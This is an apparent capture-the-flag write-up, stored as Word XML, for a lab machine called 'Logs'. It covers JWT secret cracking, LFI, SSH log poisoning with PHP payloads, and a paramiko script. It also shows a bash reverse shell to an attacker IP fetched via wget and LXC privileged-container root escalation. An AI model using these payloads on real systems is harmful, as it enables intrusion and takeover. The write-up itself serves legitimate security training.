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nkb5yrru3bcr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ezbudwebx03k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This write-up refers to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Logs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machine. If you need support, please open a ticket in the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support channel on the Discord server. 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2"/>
        <w:spacing w:after="8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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5d1nxr5hxmiz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Reconnaissance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began enumeration of the machine using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Nmap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with the objective of identifying exposed ports and accessible services within the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--min-rate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-sVC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-vvv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905000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Two open ports were identified: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22/SSH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80/HTTP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When accessing port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using curl, we observed a redirect to the virtual host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logs.hc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making it necessary to add this host to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/etc/hosts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file to allow local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DNS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resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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384663"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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46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"&lt;machine-ip&gt;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logs.hc"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/etc/hosts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695950" cy="714375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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71437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accessing the domain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logs.hc,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it was possible to view the web application exposed by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HTTP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service.</w:t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374900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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During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subdomain fuzzing,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staging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subdomain was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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ffuf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http://logs.hc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"Host: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FUZZ.logs.hc"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shubs-subdomains.txt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-fl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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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Upon accessing this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subdomain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another web application was identified as exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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35300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Within this subdomain, it was possible to register on the web application, resulting in the creation of a user account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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691749"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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74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022963"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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29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registering, we were redirected to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/dashboard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route.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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90800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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On the main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/dashboard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route, a button was identified that redirects to the application documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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86100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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When accessing this section, an exposed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Swagger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interface was identified, listing all available routes of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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73300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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Swagger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exposed, it was possible to identify the route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/api/view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accessible only with administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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066800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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Since both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staging and production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applications used the same database, it was possible to authenticate to production using the same credentials created in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staging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721100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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authenticating to the web application, we were redirected again to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/dashboard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route and, this time, received the session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JWT token.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57500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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Next, we attempted to crack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JWT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token using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Hashcat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 order to recover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secret_key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and allow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token re-signing.</w:t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16500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jwt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~/rockyou.txt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--show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739900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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Because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secret_key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was weak, it was possible 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brute-force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JWT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token.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92839853879156166491915372959629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secret_key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obtained, it was possible to re-sign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JWT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token with elevated privileges, assigning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administrator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permissions within the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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216400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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administrator privileges, it was possible to access the previously identified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/api/view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route.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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'http://logs.hc/api/view'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Bearer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&lt;your-token&gt;"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546100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="139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Upon accessing the route, the application returned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JSON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response with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{"error":"File not found"},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indicating that a file parameter needed to be provided.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adding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file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parameter, the provided value was directly included by the application, resulting in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Local File Inclusion (LFI)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vulnerability.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LFI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allowed reading of the system file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/etc/passwd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'http://logs.hc/api/view?file=/etc/passwd'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Bearer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&lt;your-token&gt;”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572000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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Since it was possible to read the SSH log file located at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/var/log/auth.log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we exploited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log poisoning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technique, which consists of injecting malicious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PHP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payloads during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authentication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attempts. Because the LFI also interpreted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PHP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code, it became possible to execute commands directly on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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'http://logs.hc/api/view?file=/var/log/auth.log'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Bearer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&lt;your-token&gt;”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74800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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exploited log poisoning by injecting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PHP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code into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SSH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username field, using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system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function with the id command. Newer versions of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SSH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restrict the use of special characters in the username field, preventing direct injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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'&lt;?php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system("id");?&gt;'@logs.hc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609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="142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then executed the Python file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E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pip3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paramiko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paramiko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paramiko.SSHClient()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ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())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ssh.connect(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hostname='logs.hc',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port=22,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username='&lt;?php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system("id");?&gt;',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password='teste'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stdin,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stdout,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stderr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ssh.exec_command('ls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-la')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print(stdout.read().decode())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ssh.close()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49400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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read the log file again to validate payload execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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PHP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code was interpreted, and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output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of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command was visible in the machine’s logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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'http://logs.hc/api/view?file=/var/log/auth.log'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Bearer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&lt;your-token&gt;”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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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command execution achieved on the system, it was possible to execute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reverse shell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created the file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index.html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containing the reverse shell payload to be executed by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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#!/bin/bash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/bin/bash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/dev/tcp/&lt;machine-ip&gt;/443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0&gt;&amp;1'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19200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 the exploit, we modified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username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 include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PHP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code responsible for downloading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reverse shell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from our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IP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and saving it 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index.html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on the target machine. We then executed the exploit again to perform log poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;?php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system("wget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&lt;machine-ip&gt;");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667000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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read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log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file again to execute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PHP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code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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27100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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received requests from the server, confirming that the file was downloaded to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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index.html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file already present, we executed the log poisoning script again to trigger the reverse shell and then read the log file to execute the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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&lt;?php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system("bash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index.html");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24550" cy="2952750"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11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9527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27100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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successfully received the reverse shell, confirming remote code execution on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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638800" cy="1990725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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99072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lxqrb9bk3nu9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Exploitation – Obtaining the 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obtained an interactive </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine.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pty;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pty.spawn('/bin/bash')"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ctr+z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ssty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-echo;fg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38300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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 the directory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/var/www/shared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we identified the database file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database.sqlite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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09900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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opening the database, we identified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users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table, which contained the password hash for user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developer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1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sqlite3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database.sqlite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43000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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password hash for user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developer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cracked using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Hashcat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~/rockyou.txt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developer:superman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673100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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It was possible to authenticate to the machine using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developer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account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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384300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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user flag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is located in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/home/developer/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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mp8vniszp1ju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Privilege Escalation – Obtaining the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Using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id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command, we identified that the user belonged to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lxc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group. LXC is a Linux container technology. Users in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lxc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group can manage containers and, in misconfigured environments, this can allow privilege escalation on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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622300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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 use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LXC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we first needed to download a container  </w:t>
      </w:r>
      <w:hyperlink r:id="rId43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image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Since the target machine did not have internet access, the container image was downloaded locally and then transferred to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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308100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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&lt;vpn-ip&gt;/alpine-v3.13-x86_64-20210218_0139.tar.gz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55700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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imported the image into LXC, making it available for container creation and execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA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lxc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alpine-v3.13-x86_64-20210218_0139.tar.gz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--alias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lxc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27100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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Next, we created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privileged container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which allows mounting system directories and partitions. We mounted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directory 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/mnt,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making it accessible from inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3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lxc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myimage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ignite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security.privileged=true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lxc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ignite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mydevice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source=/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path=/mnt/root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recursive=true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lxc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ignite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lxc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ignite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/bin/sh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31900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Now the entire system directory is available under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/mnt/root,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including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user’s folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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860800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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2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 flag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is located at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/mnt/root/root.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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413000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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sectPr>
      <w:headerReference r:id="rId50" w:type="default"/>
      <w:headerReference r:id="rId51" w:type="first"/>
      <w:headerReference r:id="rId52" w:type="even"/>
      <w:footerReference r:id="rId53" w:type="default"/>
      <w:footerReference r:id="rId54" w:type="first"/>
      <w:footerReference r:id="rId55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B">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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|All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                         Page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6">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.60idcrtbhsof" w:id="5"/>
    <w:bookmarkEnd w:id="5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-866770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129" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20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07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8">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2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-942970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136" name="image43.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image43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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="98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Logs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5679"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="98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86550" cy="301567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.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/saghul/lxd-alpine-builder/blob/master/alpine-v3.13-x86_64-20210218_0139.tar.gz" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId45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0.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId49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image" Target="media/image24.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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0.jp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3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44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3Fj951bJmh8PRmJeqCucj4WVFA==">CgMxLjAyDmgubmtiNXlycnUzYmNyMg5oLmV6YnVkd2VieDAzazIOaC41ZDFueHI1aHhtaXoyDmgubHhxcmI5YmszbnU5Mg5oLm1wOHZuaXN6cDFqdTIOaC42MGlkY3J0Ymhzb2Y4AHIhMUR2bDZrbFNvY1VUMFNPT0V4NXpCX1dGcVhWVVZhZm9V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